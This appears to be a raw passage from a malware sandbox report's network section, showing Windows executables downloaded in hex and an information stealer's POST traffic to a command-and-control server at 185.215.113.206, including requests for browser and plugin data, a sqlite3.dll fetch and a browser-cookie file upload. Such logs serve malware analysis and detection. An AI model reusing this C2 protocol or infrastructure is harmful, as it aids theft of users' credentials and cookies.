00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:18 GMTContent-Type: application/octet-streamContent-Length: 1890304Last-Modified: Tue, 10 Dec 2024 01:22:28 GMTConnection: keep-aliveETag: "675797d4-1cd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 10 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4b 00 00 04 00 00 49 a7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 6a 7a 6c 77 6b 74 00 60 1a 00 00 a0 30 00 00 58 1a 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 62 66 73 75 76 6d 00 10 00 00 00 00 4b 00 00 04 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4b 00 00 22 00 00 00 b6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:26 GMTContent-Type: application/octet-streamContent-Length: 1798144Last-Modified: Tue, 10 Dec 2024 01:22:35 GMTConnection: keep-aliveETag: "675797db-1b7000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 00 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 69 00 00 04 00 00 e1 c6 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6f 78 77 6d 76 70 6d 00 d0 19 00 00 20 4f 00 00 cc 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 72 6f 7a 71 69 6a 67 00 10 00 00 00 f0 68 00 00 04 00 00 00 4a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 69 00 00 22 00 00 00 4e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:35 GMTContent-Type: application/octet-streamContent-Length: 968192Last-Modified: Tue, 10 Dec 2024 01:20:45 GMTConnection: keep-aliveETag: "6757976d-ec600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 97 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 17 28 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 5b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 5b 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:42 GMTContent-Type: application/octet-streamContent-Length: 2821120Last-Modified: Tue, 10 Dec 2024 01:21:10 GMTConnection: keep-aliveETag: "67579786-2b0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 61 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 63 6c 6e 6a 71 76 00 c0 2a 00 00 a0 00 00 00 ac 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 74 6b 6a 6f 7a 69 00 20 00 00 00 60 2b 00 00 04 00 00 00 e6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 ea 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:53 GMTContent-Type: application/octet-streamContent-Length: 2821120Last-Modified: Tue, 10 Dec 2024 01:21:12 GMTConnection: keep-aliveETag: "67579788-2b0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 61 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 63 6c 6e 6a 71 76 00 c0 2a 00 00 a0 00 00 00 ac 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 74 6b 6a 6f 7a 69 00 20 00 00 00 60 2b 00 00 04 00 00 00 e6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 ea 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="hwid"B3664E8882872556134559------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build"stok------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="message"browsers------IDBKKKKKFBGDGDHIDBGH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="message"plugins------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"fplugins------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDAHost: 185.215.113.206Content-Length: 6827Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 